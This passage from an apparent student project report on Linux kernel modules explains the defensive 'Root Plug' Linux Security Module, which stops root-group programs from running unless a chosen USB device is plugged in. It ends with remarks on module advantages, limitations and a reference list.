    A security module registers a set of security_operations function callbacks with the kernel by calling the function register_security(). If that fails, it means that some other security module probably has been loaded already, so the mod_reg_security() function is called in an attempt to register with this security module. This can be seen in the following code:

    /* register ourselves with the security framework */
    
    if (register_security (&rootplug_security_ops)) {
       printk (KERN_INFO 
           "Failure registering Root Plug module "
           "with the kernel
    ");
       /* try registering with primary module */
       
       if (mod_reg_security (MY_NAME, 
                             &rootplug_security_ops)) {
           printk (KERN_INFO "Failure registering "
                   "Root Plug module with primary "
                   "security module.
    ");
           return -EINVAL;
       }
       secondary = 1;
    }


    When the module wants to unload itself, the reverse process must happen. If we used mod_reg_security() to register ourselves, the mod_unreg_security() function should be called, otherwise the unregister_security() function is the proper thing to call. The following code shows this logic:

    /* remove ourselves from the security framework */
    
    if (secondary) {
       if (mod_unreg_security (MY_NAME, 
                               &rootplug_security_ops))
          printk (KERN_INFO 
                  "Failure unregistering Root Plug "
                  " module with primary module.
    ");
    } else { 
       if (unregister_security (
           &rootplug_security_ops)) {
          printk (KERN_INFO "Failure unregistering "
                  "Root Plug module with the kernel
    ");
       }
    }


    The rootplug_security_ops is a large structure of function pointers that are called when various events happen in the kernel. This includes such things as whenever an inode is accessed, a module is loaded or a task is created. As of the 2.5.31 kernel, there were 88 different function pointers needed. The majority of these functions not needed by most security models, but they must be implemented, or the kernel will not work properly. If a security module does not need to do anything for a specific hook, a ``good'' value needs to be returned to the kernel. An example of this can be seen in the following function:



    static int rootplug_file_permission
        (struct file *file, int mask)
    {     return 0; }
    


    This function is called whenever the kernel wants to determine if a specific file can be accessed at this moment in time. A security module can look at the file, check whether the current user has proper authority and possibly refuse to grant it.

    Description of The Sample module
    In this example module,we want to stop a new program from being run if the specific device is not present,here the device is a USB device.
    So if that USB device is not present then it will protect the code from run. This has been done by using bprm_check_security hook. This function is called when the execve system call is made, right before the kernel tries to start up the task. If an error value is returned from this function, the task will not start. Here is our hook function:

    static int rootplug_bprm_check_security
        (struct linux_binprm *bprm)
    {
        if (bprm->e_gid == 0)
            if (find_usb_device() != 0)
                return -EPERM;
        return 0;
    }
    
    This function checks the value of the effective group ID at which the program is to be run. If it is zero, the function find_usb_device() is called. If the USB device is not found in the system, -EPERM is returned, which prevents the task from starting.


    Finding a USB Device

    The find_usb_device() function simply goes through all of the USB devices in the system and sees if the device specified by the user is present. The USB devices are kept in a tree, starting at the root hub device. The different root hubs are kept in a list of buses. These buses are checked in order in the find_usb_device() function:

    static int find_usb_device (void) {
        struct list_head *buslist;
        struct usb_bus *bus;
        int retval = -ENODEV;
    
        down (&usb_bus_list_lock);
        for (buslist = usb_bus_list.next;
             buslist != &usb_bus_list; 
             buslist = buslist->next) {
            bus = container_of (buslist, 
                                struct usb_bus, 
                                bus_list);
            retval = match_device(bus->root_hub);
            if (retval == 0)
                goto exit;
        }
    exit:
        up (&usb_bus_list_lock);
        return retval;
    }
    



    The match_device() function looks at the device passed to it. If it matches the expected device, then it returns success. Otherwise, it looks at the children of this device, calling itself recursively:

    static int match_device (struct usb_device *dev) {
       int retval = -ENODEV;
       int child;
       /* see if this device matches */
       if ((dev->descriptor.idVendor == vendor_id) &&
          (dev->descriptor.idProduct == product_id)) {        /* we found the device! */
    
           retval = 0;
           goto exit;
       }
       /* look at all of the children of this device */
       for (child = 0; child < dev->maxchild; ++child) {
           if (dev->children[child]) {
               retval = 
                   match_device (dev->children[child]);
               if (retval == 0)
                   goto exit;
           }
       }
    exit:
       return retval;
    }
    
    



    Specifying a USB Device

    Because every user has different types of USB devices, specifying the device to look for must be done in a simple manner. All USB devices have a specific vendor and product ID. You can see these values by using the lsusb or usbview program when there are some USB devices plugged in to your system. This information also is shown in the /proc/bus/usb/devices file, in the lines starting with ``P:''. See the Documentation/usb/proc_usb_info.txt file for more information on how the data in this file is presented.

    The match_device() function looks to see if the value of the specific device matches the vendor_id and product_id variables. These variables are defined in the code as:

    
    static int vendor_id = 0x0557;
    static int product_id = 0x2008;
    
    MODULE_PARM(vendor_id, "h");
    MODULE_PARM_DESC(vendor_id, 
                "USB Vendor ID of device to look for");
    
    MODULE_PARM(product_id, "h");
    MODULE_PARM_DESC(product_id, 
               "USB Product ID of device to look for");
    


    This allows the module to be loaded with the vendor and product ID specified on the command line. For example, if you want to specify a USB mouse with vendor ID of 0x04b4 and product ID of 0x0001, the module would be loaded with:

    modprobe root_plug vendor_id=0x04b4
    product_id=0x0001

    If no vendor or product ID is specified on the module load command line, the code defaults to looking for a generic USB to serial converter with a vendor ID of 0x0557 and a product ID of 0x2008.



    Building the Module

    Finally, we need to add our module to the kernel build process. This is done by adding the following line to the security/Config.in file:

    tristate 'Root Plug Support'
    CONFIG_SECURITY_ROOTPLUG

    And the following line to the security/Makefile file:

    obj-$(CONFIG_SECURITY_ROOTPLUG) += root_plug.o



    These changes allow the user to select this kernel module either to be built into the kernel directly or as a module. Run your favorite *config option to select the ``Root Plug Support''.Then build the kernel as usual.After kernel is built and running, we can load the root_plug module by typing (as root):

    modprobe root_plug vendor_id=<YOUR_VENDOR_ID>
    product_id=<YOUR_PRODUCT_ID>

    Now we can run a program as root with specified USB device plugged in to the system, and then try it without. With the module loaded, and the device removed, the following error happens on my machine:


    $ sudo ls
    sudo: unable to exec
    /bin/ls: Operation not permitted


    Plug the device back in, and things should work just fine.



    But Is It Secure?




    This example shows how powerful and simple the LSM interface can be. With one hook, any program with the root group ID is prevented from running unless a device is physically present in the system.


    Using this code, if the device is not present, users are not allowed to log in to the console, as mingetty traditionally runs as root. But users can log in through SSH as normal users, as sshd already was running before the device was removed. Web pages also can be served, and other services that do not run as root (your mail server, database server, etc.) also will function properly. If one of these server programs were broken into, and they tried to spawn a root shell, that root shell would not be allowed to run. This module does not prevent any program already running as root from cloning itself, or keep a program from trying to change the privileges that are currently assigned to it. To check for these things, the task_* functions in the security_operations structure should be used.

    There are probably other methods of taking an existing running program and spawning a root process that this module does not catch. So it is recomanded not to use it in a production environment, but rather as a learning exercise for how to create other LSM example code.


Conclusion



    Kernel Loadable Modules are designed to make life easier especially for users.Linux supports the open source movement, so developers need a way to make the old unix style a bit more attractive and easier. They implement things like KDE and other nice things. Kerneld, for example, was developed in order to make module handling easier. But remember, the easier and more automated a system is the more problems concerning security are possible. It is impossible to make a system usable by everyone and being secure enough. Modules are a great example for this.

    5.1 Advance Comparabilities


    (i) Modularized Approach : Any modules can be linked and unlined at run time. It is easy for system programmer to modify or develop any modules.

    (ii) Platform Independence : Even if it may rely on some specific hardware features ,a module does not depend on a fixed hardware platform. Ex: A disk driver module can work on IBM as well as Compaq's Alpha.

    (iii) Frugal Main Memory usage: A module can be linked to the running kernel when it's functionality is required and unlinked when it is no longer useful.

    (iv) No Performance Penalty: Once linked in, the object code of a module is equivalent to the object code of the statically linked kernel. A small performance penalty occurs when the module is lined and when it is unlinked .However, This penalty can be compared to the penalty caused by the creation and deletion of system processes in micro kernel OS.

    (v)Enhance Device Driver Loading

      1. Device - specific code can be encapsulated in a specific Module.

      2. Programmers can be add new drivers with out knowing the Kernel source code.

      3. The kernel deals with all devices in a uniform way and access them through the same interface.

      4. It is possible to write device drivers as a module that can be dynamically loaded in the kernel without requiring the system to be rebooted. It is also possible to unload a dynamically loaded module if it is no longer needed .

      5 .Using modularize approach to develop driver codes is simpler.Because it is not only version independent (to some extant ) but also user friendly.



    5.2 Considerations

    What LKMs Can't Do

    There is a tendency to think of Modules (LKMs) like user space programs. They do share a lot of their properties, but LKMs are definitely not user space programs. They are part of the kernel. As such, they have free run of the system and can easily crash it. Make a system plug & hack compatible

    It is quite impossible for any administrator to protect any Servers from hackers because their way of attack is really unpredictable . But Kernel Loadable Module is the most suitable portion of doing such abuses. So we have to know their way of doing so before we take any steps for securing our server. Here in my project I just described some idea and exploits of LKMs, and I am trying to develop some utilities also to protect our servers from this type of attack.

    5.3 The guidance

    A lot of guidance was needed because this project was completely a new one. It must be said that a lot of help was provided by my project guide Dr. Sarit Pal and Mr. Rudrarup Naskar .

    5.4 Difficulties

    The only difficulty which hindered the project was Kernel Version incompatibility. The program which executed smoothly without errors in one version (kernel version 2.2.x) failed to do so on other versions (kernel version 2.4.x).

    5.5 Future Scope of Developments

    (I) This modularize approach and run time kernel patching can be implemented in other operating system apart from GNU/Linux for enhanced system performance.

    (III) There are many options that have been left to develop kernel modules to enhance system performance, capabilities.

    (IV) Functionalities can be added to make this a full-fledged modularize kernel stuff that can be used for commercial purposes to develop device drivers.





References


    On Line Documents


    Title: "Linux 2.4 Kernel Internals"
    Author: Tigran Aivazian and Christoph Hellwig.
    URL: http://www.moses.uklinux.net/patches/lki.html
    Keywords: Linux, kernel, booting, SMB boot, VFS, page cache. Description: A little book used for a short training course. Covers building the kernel image, booting (including SMP bootup), process management, VFS and more.

    Title: "Linux Device Drivers, 2nd Edition"
    Author: Alessandro Rubini and Jonathan Corbet.
    URL: http://www.oreilly.com/catalog/linuxdrive2/chapter/book/index.html
    Keywords: device drivers, modules, debugging, memory, hardware, interrupt handling, char drivers, block drivers, kmod, mmap, DMA, buses.
    Description: O'Reilly's popular book, now also on-line under the GNU Free Documentation License.

    Name: "Linux Virtual File System"
    Author: Peter J. Braam.
    URL: http://www.coda.cs.cmu.edu/doc/talks/linuxvfs/
    Keywords: slides, VFS, inode, superblock, dentry, dcache.
    Description: Set of slides, presumably from a presentation on the Linux VFS layer. Covers version 2.1.x, with dentries and the dcache.

    Title: "The Linux Kernel"
    Author: David A. Rusling.
    URL: http://www.linuxdoc.org/LDP/tlk/tlk.html
    Keywords: everything!, book.
    Description: On line, 200 pages book describing most aspects of the Linux Kernel. Probably, the first reference for beginners. Lots of illustrations explaining data structures use and relationships in the purest Richard W. Stevens' style. Contents: "1.-Hardware Basics, 2.-Software Basics, 3.-Memory Management, 4.-Processes, 5.-Interprocess Communication Mechanisms, 6.-PCI, 7.-Interrupts and Interrupt Handling, 8.-Device Drivers, 9.-The File system, 10.-Networks, 11.-Kernel Mechanisms, 12.-Modules, 13.-The Linux Kernel Sources, A.-Linux Data Structures, B.-The Alpha AXP Processor, C.-Useful Web and FTP Sites, D.-The GNU General Public License, Glossary". In short: a must have.


    Title: "The Linux Kernel Hackers' Guide"
    Author: Michael K.Johnson and others.
    URL: http://www.linuxdoc.org/LDP/khg/HyperNews/get/khg.html
    Keywords: everything!
    Description: No more Postscript book-like version. Only HTML now. Many people have contributed. The interface is similar to web available mailing lists archives. You can find some articles and then some mails asking questions about them and/or complementing previous contributions. A little bit anarchic in this aspect, but with some valuable information in some cases.

    Title: "Overview of the Virtual File System"
    Author: Richard Gooch.
    URL: http://www.atnf.csiro.au/~rgooch/linux/vfs.txt
    Keywords: VFS, File System, mounting filesystems, opening files, dentries, dcache.
    Description: Brief introduction to the Linux Virtual File System. What is it, how it works, operations taken when opening a file or mounting a file system and description of important data structures explaining the purpose of each of their entries.


    Title: "Dynamic Kernels: Modularized Device Drivers"
    Author: Alessandro Rubini.
    URL: http://www2.linuxjournal.com/lj-issues/issue23/1219.html
    Keywords: device driver, module, loading/unloading modules, allocating resources.
    Description: Linux Journal Kernel Korner article. Here is it's abstract: "This is the first of a series of four articles co-authored by Alessandro Rubini and Georg Zezchwitz which present a practical approach to writing Linux device drivers as kernel loadable modules. This installment presents an introduction to the topic, preparing the reader to understand next month's installment".


    Title: "The Devil's in the Details"
    Author: Georg v. Zezschwitz and Alessandro Rubini.
    URL: http://www2.linuxjournal.com/lj-issues/issue25/1221.html
    Keywords: read(), write(), select(), ioctl(), blocking/non blocking mode, interrupt handler.
    Description: Linux Journal Kernel Korner article. Here is it's abstract: "This article, the third of four on writing character device drivers,
    introduces concepts of reading, writing, and using ioctl-calls".


    Title: "Device Drivers Concluded"
    Author: Georg v. Zezschwitz.
    URL: http://www2.linuxjournal.com/lj-issues/issue28/1287.html
    Keywords: address spaces, pages, pagination, page management, demand loading, swapping, memory protection, memory mapping, mmap, virtual memory areas (VMAs), vremap, PCI.
    Description: Finally, the above turned out into a five articles series. This latest one's introduction reads: "This is the last of five articles about character device drivers. In this final section, Georg deals with memory mapping devices, beginning with an overall description of the Linux memory management concepts".


    Title: "Writing Linux Device Drivers"
    Author: Michael K. Johnson.
    URL: http://people.redhat.com/johnsonm/devices.html
    Keywords: files, VFS, file operations, kernel interface, character vs block devices, I/O access, hardware interrupts, DMA, access to user memory, memory allocation, timers.
    Description: Introductory 50-minutes (sic) tutorial on writing device drivers. 12 pages written by the same author of the "Kernel Hackers' Guide" which give a very good overview of the topic.


    Title: "Writing Character Device Driver for Linux"
    Author: R. Baruch and C. Schroeter
    . URL: ftp://ftp.llp.fu-berlin.de/pub/linux/LINUX-LAB/whitepapers/drivers.ps.gz
    Keywords: character device drivers, I/O, signals, DMA, accessing ports in user space, kernel environment.
    Description: 68 pages paper on writing character drivers. A little bit old (1.993, 1.994) although still useful.


    Title: "Analysis of the Ext2fs structure"
    Author: Louis-Dominique Dubeau.
    URL: http://www.nondot.org/sabre/os/files/FileSystems/ext2fs/
    Keywords: ext2, filesystem, ext2fs.
    Description: Description of ext2's blocks, directories, inodes, bitmaps, invariants...


    Title: "Journaling the Linux ext2fs Filesystem"
    Author: Stephen C. Tweedie.
    URL: ftp://ftp.uk.linux.org/pub/linux/sct/fs/jfs/journal-design.ps.gz
    Keywords: ext3, journaling.
    Description: Excellent 8-pages paper explaining the journaling capabilities added to ext2 by the author, showing different problems faced and the alternatives chosen.


    Title: "Linux Kernel Module Programming Guide"
    Author: Ori Pomerantz.
    URL: http://www.linuxdoc.org/LDP/lkmpg/mpg.html
    Keywords: modules, GPL book, /proc, ioctls, system calls, interrupt handlers .
    Description: Very nice 92 pages GPL book on the topic of modules programming. Lots of examples.


    Title: "The Kernel Hacking HOWTO"
    Author: Various Talented People, and Rusty.
    URL: http://www.lisoleg.net/doc/Kernel-Hacking-HOWTO/kernel-hacking-HOWTO.html
    Keywords: HOWTO, kernel contexts, deadlock, locking, modules, symbols, return conventions.
    Description: From the Introduction: "Please understand that I never wanted to write this document, being grossly underqualified, but I always wanted to read it, and this was the only way. I simply explain some best practices, and give reading entry-points into the kernel sources. I avoid implementation details: that's what the code is for, and I ignore whole tracts of useful routines. This document assumes familiarity with C, and an understanding of what the kernel is, and how it is used. It was originally written for the 2.3 kernels, but nearly all of it applies to 2.2 too; 2.0 is slightly different".


    Title: "Kernel Hacking HOWTO"
    Author: Andrew Ebling.
    URL: http://www.kernelhacking.org/docs/kernelhacking-HOWTO/
    Keywords: HOWTO, kernel hacking, getting started, source navigation, kernel debugging, profiling, benchmarking.
    Description: Another kernel hacking howto. More recent than Rusty's.
    Notes: Some TODO sections. Want to help?


    Title: "Linux Kernel Threads in Device Drivers"
    Author: Martin Frey.
    URL: http://www.scs.ch/~frey/linux/kernelthreads.html
    Keywords: threads, creation, stopping, initialization.
    Description: How to start and stop kernel threads in a loadable module.



    BOOKS


    Title: "Linux Device Drivers"
    Author: Alessandro Rubini.
    Publisher: O'Reilly & Associates.
    Title: "Linux Device Drivers, 2nd Edition"
    Author: Alessandro Rubini and Jonathan Corbet.
    Publisher: O'Reilly & Associates.
    Notes: It is also on-line (under the GNU Free Documentation License) at http://www.oreilly.com/catalog/linuxdrive2/chapter/book/index.html

    Title: "The Design of the UNIX Operating System"
    Author: Maurice J. Bach.
    Publisher: Prentice Hall.


    Title: "Programming for the real world - POSIX.4"
    Author: Bill O. Gallmeister.
    Publisher: O'Reilly & Associates, Inc..
    Notes: Though not being directly about Linux, Linux aims to be POSIX. Good reference.


    Title: "Understanding the Linux Kernel"
    Author: Daniel P. Bovet and Marco Cesati.
    Publisher: O'Reilly & Associates, Inc..
    Notes: Further information in http://www.oreilly.com/catalog/linuxkernel/



    Others

    1.idea conceived -2001 Linux Kernel Summit
    2.detailed description of design 2002 USENIX Security Conference (lsm.immunix.org/docs/lsm-usenix-2002/html/)
    3.technical description of how the LSM interface works (www.linux.org.uk/~ajh/ols2002_proceedings.pdf.gz).